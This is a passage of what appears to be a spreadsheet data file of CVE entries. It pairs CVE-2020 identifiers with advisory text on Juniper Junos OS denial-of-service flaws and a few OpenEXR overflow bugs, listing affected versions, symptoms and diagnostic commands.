    <t>In a certain condition, receipt of a specific BGP UPDATE message might cause Juniper Networks Junos OS and Junos OS Evolved devices to advertise an invalid BGP UPDATE message to other peers, causing the other peers to terminate the established BGP session, creating a Denial of Service (DoS) condition. For example, Router A sends a specific BGP UPDATE to Router B, causing Router B to send an invalid BGP UPDATE message to Router C, resulting in termination of the BGP session between Router B and Router C. This issue might occur when there is at least a single BGP session established on the device that does not support 4 Byte AS extension (RFC 4893). Repeated receipt of the same BGP UPDATE can result in an extended DoS condition. This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R1-S9, 17.2R2-S8, 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D105, 17.2X75-D110, 17.2X75-D44; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S8, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D411, 18.2X75-D420, 18.2X75-D51, 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R3; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2. This issue does not affect Juniper Networks Junos OS prior to 16.1R1. This issue affects Juniper Networks Junos OS Evolved prior to 19.2R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-1633</t>
  </si>
  <si>
    <t>Due to a new NDP proxy feature for EVPN leaf nodes introduced in Junos OS 17.4, crafted NDPv6 packets could transit a Junos device configured as a Broadband Network Gateway (BNG) and reach the EVPN leaf node, causing a stale MAC address entry. This could cause legitimate traffic to be discarded, leading to a Denial of Service (DoS) condition. This issue only affects Junos OS 17.4 and later releases. Prior releases do not support this feature and are unaffected by this vulnerability. This issue only affects IPv6. IPv4 ARP proxy is unaffected by this vulnerability. This issue affects Juniper Networks Junos OS: 17.4 versions prior to 17.4R2-S9, 17.4R3 on MX Series; 18.1 versions prior to 18.1R3-S9 on MX Series; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3 on MX Series; 18.2X75 versions prior to 18.2X75-D33, 18.2X75-D411, 18.2X75-D420, 18.2X75-D60 on MX Series; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3 on MX Series; 18.4 versions prior to 18.4R1-S5, 18.4R2-S2, 18.4R3 on MX Series; 19.1 versions prior to 19.1R1-S4, 19.1R2 on MX Series; 19.2 versions prior to 19.2R1-S3, 19.2R2 on MX Series.</t>
  </si>
  <si>
    <t>CVE-2020-1634</t>
  </si>
  <si>
    <t>On High-End SRX Series devices, in specific configurations and when specific networking events or operator actions occur, an SPC receiving genuine multicast traffic may core. Subsequently, all FPCs in a chassis may reset causing a Denial of Service. This issue affects both IPv4 and IPv6. This issue affects: Juniper Networks Junos OS 12.3X48 version 12.3X48-D80 and later versions prior to 12.3X48-D95 on High-End SRX Series. This issue does not affect Branch SRX Series devices.</t>
  </si>
  <si>
    <t>CVE-2020-1637</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks SRX Series device configured as a Junos OS Enforcer device may allow a user to access network resources that are not permitted by a UAC policy. This issue might occur when the IP address range configured in the Infranet Controller (IC) is configured as an IP address range instead of an IP address/netmask. See the Workaround section for more detail. The Junos OS Enforcer CLI settings are disabled by default. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D100; 15.1X49 versions prior to 15.1X49-D210; 17.3 versions prior to 17.3R2-S5, 17.3R3-S8; 17.4 versions prior to 17.4R2-S9, 17.4R3-S1; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R3-S2; 18.4 versions prior to 18.4R1-S6, 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R1-S4, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2-S1, 19.3R3; 19.4 versions prior to 19.4R1-S1, 19.4R2.</t>
  </si>
  <si>
    <t>CVE-2020-1638</t>
  </si>
  <si>
    <t>The FPC (Flexible PIC Concentrator) of Juniper Networks Junos OS and Junos OS Evolved may restart after processing a specific IPv4 packet. Only packets destined to the device itself, successfully reaching the RE through existing edge and control plane filtering, will be able to cause the FPC restart. When this issue occurs, all traffic via the FPC will be dropped. By continuously sending this specific IPv4 packet, an attacker can repeatedly crash the FPC, causing an extended Denial of Service (DoS) condition. This issue can only occur when processing a specific IPv4 packet. IPv6 packets cannot trigger this issue. This issue affects: Juniper Networks Junos OS on MX Series with MPC10E or MPC11E and PTX10001: 19.2 versions prior to 19.2R1-S4, 19.2R2; 19.3 versions prior to 19.3R2-S2, 19.3R3; 19.4 versions prior to 19.4R1-S1, 19.4R2. Juniper Networks Junos OS Evolved on on QFX5220, and PTX10003 series: 19.2-EVO versions; 19.3-EVO versions; 19.4-EVO versions prior to 19.4R2-EVO. This issue does not affect Junos OS versions prior to 19.2R1. This issue does not affect Junos OS Evolved versions prior to 19.2R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-1639</t>
  </si>
  <si>
    <t>When an attacker sends a specific crafted Ethernet Operation, Administration, and Maintenance (Ethernet OAM) packet to a target device, it may improperly handle the incoming malformed data and fail to sanitize this incoming data resulting in an overflow condition. This overflow condition in Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) condition by coring the CFM daemon. Continued receipt of these packets may cause an extended Denial of Service condition. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95 on SRX Series; 14.1X50 versions prior to 14.1X50-D145; 14.1X53 versions prior to 14.1X53-D47; 15.1 versions prior to 15.1R2; 15.1X49 versions prior to 15.1X49-D170 on SRX Series; 15.1X53 versions prior to 15.1X53-D67.</t>
  </si>
  <si>
    <t>CVE-2020-1640</t>
  </si>
  <si>
    <t>An improper use of a validation framework when processing incoming genuine BGP packets within Juniper Networks RPD (routing protocols process) daemon allows an attacker to crash RPD thereby causing a Denial of Service (DoS) condition. This framework requires these packets to be passed. By continuously sending any of these types of formatted genuine packets, an attacker can repeatedly crash the RPD process causing a sustained Denial of Service. Authentication to the BGP peer is not required. This issue can be initiated or propagated through eBGP and iBGP and can impact devices in either modes of use as long as the devices are configured to support the compromised framework and a BGP path is activated or active. This issue affects: Juniper Networks Junos OS 16.1 versions 16.1R7-S6 and later versions prior to 16.1R7-S8; 17.3 versions 17.3R2-S5, 17.3R3-S6 and later versions prior to 17.3R3-S8; 17.4 versions 17.4R2-S7, 17.4R3 and later versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions 18.1R3-S7 and later versions prior to 18.1R3-S10; 18.2 versions 18.2R2-S6, 18.2R3-S2 and later versions prior to 18.2R2-S7, 18.2R3-S5; 18.2X75 versions 18.2X75-D12, 18.2X75-D32, 18.2X75-D33, 18.2X75-D51, 18.2X75-D60, 18.2X75-D411, 18.2X75-D420 and later versions prior to 18.2X75-D32, 18.2X75-D33, 18.2X75-D420, 18.2X75-D52, 18.2X75-D60, 18.2X75-D65, 18.2X75-D70;(*1) 18.3 versions 18.3R1-S6, 18.3R2-S3, 18.3R3 and later versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions 18.4R1-S5, 18.4R2-S4, 18.4R3 and later versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3(*2); 19.1 versions 19.1R1-S3, 19.1R2 and later versions prior to 19.1R1-S5, 19.1R2-S2, 19.1R3-S2; 19.2 versions 19.2R1-S2, 19.2R2 and later versions prior to 19.2R1-S5, 19.2R2, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2, 19.4R3; 20.1 versions prior to 20.1R1-S1, 20.1R2. This issue does not affect Junos OS prior to 16.1R1. This issue affects IPv4 and IPv6 traffic.</t>
  </si>
  <si>
    <t>CVE-2020-1641</t>
  </si>
  <si>
    <t>A Race Condition vulnerability in Juniper Networks Junos OS LLDP implementation allows an attacker to cause LLDP to crash leading to a Denial of Service (DoS). This issue occurs when crafted LLDP packets are received by the device from an adjacent device. Multiple LACP flaps will occur after LLDP crashes. An indicator of compromise is to evaluate log file details for lldp with RLIMIT. Intervention should occur before 85% threshold of used KB versus maximum available KB memory is reached. show log messages | match RLIMIT | match lldp | last 20 Matching statement is " /kernel: %KERNEL-[number]: Process ([pid #],lldpd) has exceeded 85% of RLIMIT_DATA: " with [] as variable data to evaluate for. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R1-S9, 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S6; 17.4 versions prior to 17.4R2-S4, 17.4R3; 18.1 versions prior to 18.1R3-S5; 18.2 versions prior to 18.2R2-S7, 18.2R3; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D50, 18.2X75-D420; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2; 19.1 versions prior to 19.1R1-S4, 19.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1643</t>
  </si>
  <si>
    <t>Execution of the "show ospf interface extensive" or "show ospf interface detail" CLI commands on a Juniper Networks device running Junos OS may cause the routing protocols process (RPD) to crash and restart if OSPF interface authentication is configured, leading to a Denial of Service (DoS). By continuously executing the same CLI commands, a local attacker can repeatedly crash the RPD process causing a sustained Denial of Service. Note: Only systems utilizing ARM processors, found on the EX2300 and EX3400, are vulnerable to this issue. Systems shipped with other processor architectures are not vulnerable to this issue. The processor architecture can be displayed via the 'uname -a' command. For example: ARM (vulnerable): % uname -a | awk '{print $NF}' arm PowerPC (not vulnerable): % uname -a | awk '{print $NF}' powerpc AMD (not vulnerable): % uname -a | awk '{print $NF}' amd64 Intel (not vulnerable): % uname -a | awk '{print $NF}' i386 This issue affects Juniper Networks Junos OS: 12.3X48 versions prior to 12.3X48-D100; 14.1X53 versions prior to 14.1X53-D140, 14.1X53-D54; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D210; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.1 versions prior to 17.1R2-S12; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S2, 17.4R3; 18.1 versions prior to 18.1R3-S2; 18.2 versions prior to 18.2R2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S2, 18.3R2.</t>
  </si>
  <si>
    <t>CVE-2020-1644</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved devices, the receipt of a specific BGP UPDATE packet causes an internal counter to be incremented incorrectly, which over time can lead to the routing protocols process (RPD) crash and restart. This issue affects both IBGP and EBGP multihop deployment in IPv4 or IPv6 network. This issue affects: Juniper Networks Junos OS: 17.2X75 versions prior to 17.2X75-D105.19; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S10, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.2X75 versions prior to 18.2X75-D13, 18.2X75-D411.1, 18.2X75-D420.18, 18.2X75-D52.3, 18.2X75-D60; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S2, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2. Juniper Networks Junos OS Evolved: any releases prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS releases prior to 17.3R1.</t>
  </si>
  <si>
    <t>CVE-2020-1645</t>
  </si>
  <si>
    <t>When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing "URL Filtering service", may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. If the issue occurs, system core-dumps output will show a crash of mspmand process: root@device&gt; show system core-dumps -rw-rw---- 1 nobody wheel 575685123 &lt;Date&gt; /var/tmp/pics/mspmand.core.&lt;*&gt;.gz This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R2-S4, 18.3R3-S1; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS releases prior to 17.3R2.</t>
  </si>
  <si>
    <t>CVE-2020-1646</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved devices, processing a specific UPDATE for an EBGP peer can lead to a routing process daemon (RPD) crash and restart. This issue occurs only when the device is receiving and processing the BGP UPDATE for an EBGP peer. This issue does not occur when the device is receiving and processing the BGP UPDATE for an IBGP peer. However, the offending BGP UPDATE can originally come from an EBGP peer, propagates through the network via IBGP peers without causing crash, then it causes RPD crash when it is processed for a BGP UPDATE towards an EBGP peer. Repeated receipt and processing of the same specific BGP UPDATE can result in an extended Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 17.3R3-S6, 17.4R2-S7, and 18.1R3-S7. Juniper Networks Junos OS Evolved 19.2R2-EVO and later versions, prior to 19.3R1-EVO. Other Junos OS releases are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-1647</t>
  </si>
  <si>
    <t>On Juniper Networks SRX Series with ICAP (Internet Content Adaptation Protocol) redirect service enabled, a double free vulnerability can lead to a Denial of Service (DoS) or Remote Code Execution (RCE) due to processing of a specific HTTP message. Continued processing of this specific HTTP message may result in an extended Denial of Service (DoS). The offending HTTP message that causes this issue may originate both from the HTTP server or the client. This issue affects Juniper Networks Junos OS on SRX Series: 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S1; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2; 19.3 versions prior to 19.3R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-1648</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved devices, processing a specific BGP packet can lead to a routing process daemon (RPD) crash and restart. This issue can occur even before the BGP session with the peer is established. Repeated receipt of this specific BGP packet can result in an extended Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 18.2X75 versions starting from 18.2X75-D50.8, 18.2X75-D60 and later versions, prior to 18.2X75-D52.8, 18.2X75-D53, 18.2X75-D60.2, 18.2X75-D65.1, 18.2X75-D70; 19.4 versions 19.4R1 and 19.4R1-S1; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: 19.4-EVO versions prior to 19.4R2-S2-EVO; 20.1-EVO versions prior to 20.1R2-EVO. This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-1649</t>
  </si>
  <si>
    <t>When a device running Juniper Networks Junos OS with MPC7, MPC8, or MPC9 line cards installed and the system is configured for inline IP reassembly, used by L2TP, MAP-E, GRE, and IPIP, the packet forwarding engine (PFE) will become disabled upon receipt of small fragments requiring reassembly, generating the following error messages: [LOG: Err] MQSS(2): WO: Packet Error - Error Packets 1, Connection 29 [LOG: Err] eachip_hmcif_rx_intr_handler(7259): EA[2:0]: HMCIF Rx: Injected checksum error detected on WO response - Chunk Address 0x0 [LOG: Err] MQSS(2): DRD: RORD1: CMD reorder ID error - Command 11, Reorder ID 1960, QID 0 [LOG: Err] MQSS(2): DRD: UNROLL0: HMC chunk address error in stage 5 - Chunk Address: 0xc38fb1 [LOG: Notice] Error: /fpc/0/pfe/0/cm/0/MQSS(2)/2/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc), scope: pfe, category: functional, severity: major, module: MQSS(2), type: DRD_RORD_ENG_INT: CMD FSM State Error [LOG: Notice] Performing action cmalarm for error /fpc/0/pfe/0/cm/0/MQSS(2)/2/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(2) with scope: pfe category: functional level: major [LOG: Notice] Performing action get-state for error /fpc/0/pfe/0/cm/0/MQSS(2)/2/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(2) with scope: pfe category: functional level: major [LOG: Notice] Performing action disable-pfe for error /fpc/0/pfe/0/cm/0/MQSS(2)/2/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(2) with scope: pfe category: functional level: major By continuously sending fragmented packets that cannot be reassembled, an attacker can repeatedly disable the PFE causing a sustained Denial of Service (DoS). This issue affects Juniper Networks Junos OS: 17.2 versions prior to 17.2R3-S4 on MX Series; 17.3 versions prior to 17.3R3-S8 on MX Series; 17.4 versions prior to 17.4R2-S9, 17.4R3-S1 on MX Series; 18.1 versions prior to 18.1R3-S10 on MX Series; 18.2 versions prior to 18.2R2-S6, 18.2R3-S3 on MX Series; 18.2X75 versions prior to 18.2X75-D34, 18.2X75-D41, 18.2X75-D53, 18.2X75-D65, 18.2X75-D430 on MX Series; 18.3 versions prior to 18.3R1-S7, 18.3R2-S4, 18.3R3-S2 on MX Series; 18.4 versions prior to 18.4R1-S6, 18.4R2-S4, 18.4R3 on MX Series; 19.1 versions prior to 19.1R1-S4, 19.1R2-S1, 19.1R3 on MX Series; 19.2 versions prior to 19.2R1-S3, 19.2R2 on MX Series; 19.3 versions prior to 19.3R2-S2, 19.3R3 on MX Series. This issue is specific to inline IP reassembly, introduced in Junos OS 17.2. Versions of Junos OS prior to 17.2 are unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1650</t>
  </si>
  <si>
    <t>On Juniper Networks Junos MX Series with service card configured, receipt of a stream of specific packets may crash the MS-PIC component on MS-MIC or MS-MPC. By continuously sending these specific packets, an attacker can repeatedly bring down MS-PIC on MS-MIC/MS-MPC causing a prolonged Denial of Service. This issue affects MX Series devices using MS-PIC, MS-MIC or MS-MPC service cards with any service configured. This issue affects Juniper Networks Junos OS on MX Series: 17.2R2-S7; 17.3R3-S4, 17.3R3-S5; 17.4R2-S4 and the subsequent SRs (17.4R2-S5, 17.4R2-S6, etc.); 17.4R3; 18.1R3-S3, 18.1R3-S4, 18.1R3-S5, 18.1R3-S6, 18.1R3-S7, 18.1R3-S8; 18.2R3, 18.2R3-S1, 18.2R3-S2; 18.3R2 and the SRs based on 18.3R2; 18.4R2 and the SRs based on 18.4R2; 19.1R1 and the SRs based on 19.1R1; 19.2R1 and the SRs based on 19.2R1; 19.3R1 and the SRs based on 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2020-1651</t>
  </si>
  <si>
    <t>On Juniper Networks MX series, receipt of a stream of specific Layer 2 frames may cause a memory leak resulting in the packet forwarding engine (PFE) on the line card to crash and restart, causing traffic interruption. By continuously sending this stream of specific layer 2 frame, an attacker connected to the same broadcast domain can repeatedly crash the PFE, causing a prolonged Denial of Service (DoS). This issue affects Juniper Networks Junos OS on MX Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D105.19; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R1-S3, 17.4R2; 18.1 versions prior to 18.1R2. This issue does not affect Juniper Networks Junos OS releases prior to 17.2R1.</t>
  </si>
  <si>
    <t>CVE-2020-1652</t>
  </si>
  <si>
    <t>OpenNMS is accessible via port 9443</t>
  </si>
  <si>
    <t>CVE-2020-1653</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices, a stream of TCP packets sent to the Routing Engine (RE) may cause mbuf leak which can lead to Flexible PIC Concentrator (FPC) crash or the system to crash and restart (vmcore). This issue can be trigged by IPv4 or IPv6 and it is caused only by TCP packets. This issue is not related to any specific configuration and it affects Junos OS releases starting from 17.4R1. However, this issue does not affect Junos OS releases prior to 18.2R1 when Nonstop active routing (NSR) is configured [edit routing-options nonstop-routing]. The number of mbufs is platform dependent. The following command provides the number of mbufs counter that are currently in use and maximum number of mbufs that can be allocated on a platform: user@host&gt; show system buffers 2437/3143/5580 mbufs in use (current/cache/total) Once the device runs out of mbufs, the FPC crashes or the vmcore occurs and the device might become inaccessible requiring a manual restart. This issue affects Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D420.12, 18.2X75-D51, 18.2X75-D60, 18.2X75-D34; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2. Versions of Junos OS prior to 17.4R1 are unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1654</t>
  </si>
  <si>
    <t>On Juniper Networks SRX Series with ICAP (Internet Content Adaptation Protocol) redirect service enabled, processing a malformed HTTP message can lead to a Denial of Service (DoS) or Remote Code Execution (RCE) Continued processing of this malformed HTTP message may result in an extended Denial of Service (DoS) condition. The offending HTTP message that causes this issue may originate both from the HTTP server or the HTTP client. This issue affects Juniper Networks Junos OS on SRX Series: 18.1 versions prior to 18.1R3-S9 ; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S4, 18.3R3-S1; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2; 19.3 versions prior to 19.3R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-1655</t>
  </si>
  <si>
    <t>When a device running Juniper Networks Junos OS with MPC7, MPC8, or MPC9 line cards installed and the system is configured for inline IP reassembly, used by L2TP, MAP-E, GRE, and IPIP, the packet forwarding engine (PFE) will become disabled upon receipt of large packets requiring fragmentation, generating the following error messages: [LOG: Err] MQSS(0): WO: Packet Error - Error Packets 1, Connection 29 [LOG: Err] eachip_hmcif_rx_intr_handler(7259): EA[0:0]: HMCIF Rx: Injected checksum error detected on WO response - Chunk Address 0x0 [LOG: Err] MQSS(0): DRD: RORD1: CMD reorder ID error - Command 11, Reorder ID 1838, QID 0 [LOG: Err] MQSS(0): DRD: UNROLL0: HMC chunk length error in stage 5 - Chunk Address: 0x4321f3 [LOG: Err] MQSS(0): DRD: UNROLL0: HMC chunk address error in stage 5 - Chunk Address: 0x0 [LOG: Notice] Error: /fpc/8/pfe/0/cm/0/MQSS(0)/0/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc), scope: pfe, category: functional, severity: major, module: MQSS(0), type: DRD_RORD_ENG_INT: CMD FSM State Error [LOG: Notice] Performing action cmalarm for error /fpc/8/pfe/0/cm/0/MQSS(0)/0/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(0) with scope: pfe category: functional level: major [LOG: Notice] Performing action get-state for error /fpc/8/pfe/0/cm/0/MQSS(0)/0/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(0) with scope: pfe category: functional level: major [LOG: Notice] Performing action disable-pfe for error /fpc/8/pfe/0/cm/0/MQSS(0)/0/MQSS_CMERROR_DRD_RORD_ENG_INT_REG_CMD_FSM_STATE_ERR (0x2203cc) in module: MQSS(0) with scope: pfe category: functional level: major By continuously sending fragmented packets that cannot be reassembled, an attacker can repeatedly disable the PFE causing a sustained Denial of Service (DoS). This issue affects Juniper Networks Junos OS: 17.2 versions prior to 17.2R3-S4 on MX Series; 17.3 versions prior to 17.3R3-S8 on MX Series; 17.4 versions prior to 17.4R2-S10, 17.4R3-S2 on MX Series; 18.1 versions prior to 18.1R3-S10 on MX Series; 18.2 versions prior to 18.2R3-S3 on MX Series; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D65 on MX Series; 18.3 versions prior to 18.3R1-S7, 18.3R2-S4, 18.3R3-S1 on MX Series; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3 on MX Series; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3 on MX Series; 19.2 versions prior to 19.2R1-S4, 19.2R2 on MX Series; 19.3 versions prior to 19.3R2-S2, 19.3R3 on MX Series. This issue is specific to inline IP reassembly, introduced in Junos OS 17.2. Versions of Junos OS prior to 17.2 are unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1656</t>
  </si>
  <si>
    <t>The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHPCv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2.</t>
  </si>
  <si>
    <t>CVE-2020-1657</t>
  </si>
  <si>
    <t>On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases.</t>
  </si>
  <si>
    <t>CVE-2020-16587</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability exists in Academy Software Foundation OpenEXR 2.3.0 in chunkOffsetReconstruction in ImfMultiPartInputFile.cpp that can cause a denial of service via a crafted EXR file.</t>
  </si>
  <si>
    <t>CVE-2020-16588</t>
  </si>
  <si>
    <t>A Null Pointer Deference issue exists in Academy Software Foundation OpenEXR 2.3.0 in generatePreview in makePreview.cpp that can cause a denial of service via a crafted EXR file.</t>
  </si>
  <si>
    <t>CVE-2020-16589</t>
  </si>
  <si>
    <t>A head-based buffer overflow exists in Academy Software Foundation OpenEXR 2.3.0 in writeTileData in ImfTiledOutputFile.cpp that can cause a denial of service via a crafted EXR file.</t>
  </si>
  <si>
    <t>CVE-2020-16590</t>
  </si>
  <si>
